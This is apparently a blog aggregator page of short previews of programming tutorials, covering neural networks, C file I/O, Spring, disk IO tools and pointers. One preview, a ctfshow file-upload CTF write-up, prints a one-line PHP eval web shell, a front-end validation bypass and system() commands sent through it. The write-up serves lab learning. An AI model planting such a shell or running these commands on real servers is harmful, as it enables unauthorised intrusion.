[machine learning] basic learning notes of DS 4: neural network and back propagation algorithm
Neural network and back propagation algorithm
4.1 cost function
in the previous section, we learned the basic structure of neural network and forward propagation algorithm. In the supporting operation, the weights of neural network have been given, but how can we train the appropriate weights ourselves? Therefore, we need to ...
Posted by garethdown on Sat, 26 Feb 2022 16:30:27 +0100
C/C + + programs read (save) data from text files
In C program:
When dealing with data (files) outside the program code, we use the concept of stream to realize the data exchange between the process's virtual memory and files.
——FILE stream: the C standard library provides FILE (named FILE because linux treats all mechanisms as files). The FILE object is a structure that contain ...
Posted by bqheath on Sat, 26 Feb 2022 16:20:47 +0100
[ctfshow] file upload web151-170wp
web151
1. Write a sentence and upload it
It is found that the front end has verification
<?php @eval($_POST[1]);?>
Directly click on F12
2. Modify front-end verification
You can upload successfully
3. Find flag on ant sword
//Common commands:
1=system("ls /"); //Find root directory
1=system("ls ./"); //Find c ...
Posted by Juan Dela Cruz on Sat, 26 Feb 2022 15:55:08 +0100
Simply use SpringBoot to integrate spring security
Introduction to spring security
Spring security is a security framework for spring projects. It is also the default technology type of the underlying security module of spring boot. It can realize powerful Web security control. For security control, it provides Authentication,to grant authorization and Protection against common attacks . It ...
Posted by bahewitt on Sat, 26 Feb 2022 15:53:49 +0100
018 disk IO performance monitoring / pressure measurement tools (sar, iotop, fio, iostat)
1. Use the SAR command to view the current disk IO read / writesar (System Activity Reporter system activity report) is one of the most comprehensive system performance analysis tools on Linux. It can report system activities from many aspects, including file reading and writing, system call usage, disk I/O, CPU efficiency, memory usage, proces ...
Posted by cape on Sat, 26 Feb 2022 15:46:46 +0100
Control inversion / dependency injection in Spring
Chapter 1 control inversion / dependency injection in Spring
review
Add, delete, modify and check.
Pre class test:
Contents of this chapter
Spring: Spring IOC: give the power to create objects to the spring core container. Factory mode
BeanFactory: lazy man
ApplicationContext: hungry man
< bean id="" name="" class="" scope="" >
T ...
Posted by akufen on Sat, 26 Feb 2022 15:44:43 +0100
Elementary C language - pointer
catalogue
I What is the pointer
II Pointer and pointer type
3. Field pointer
4. Pointer operation
5. Pointer and array
6. Secondary pointer
7. Pointer array
I What is the pointer
Understand pointer
1. Pointer is the number of the smallest unit in memory, that is, the address2. The pointer in spoken English usually refers to the p ...
Posted by roldahayes on Sat, 26 Feb 2022 15:41:28 +0100
Day 28 of learning big data - UDP, TCP transmission, classloader, reflection and dynamic proxy
UDP transport
1: Establish udp socket service 2: Receive data through receive method 3: Store the received data in the packet object 4: Analyze the received data through the function of packet object 5: Resources can be closed
client
/*
Add feedback according to our normal thinking, but there is no response. Why
The reas ...
Posted by zarp on Sat, 26 Feb 2022 15:23:27 +0100
Certification and authorization series subject: saml2 0 Getting Started Guide
This article is transferred from: Climb high and Fu
SAML, fully known as Security Assertion Markup Language, is a markup preload for security assertion. The latest version is 2.0. Original address Related articles in this series:OAuth2.0 protocol Getting Started GuideOpenID Connect protocol Getting Started GuideOpenSAML sample
SAML is ve ...
Posted by tomharding on Sat, 26 Feb 2022 15:22:34 +0100
Javase (day05: process control statement)
if selection structure
1. Classification
if single choice structureif double choice structureif multiple selection structure
2. if single choice structure
Syntax: if (conditional expression){ }Note: the code in curly braces (code block) will be executed only when the return value of the conditional expression is true
3. if double choice stru ...
Posted by sorenchr on Sat, 26 Feb 2022 15:15:52 +0100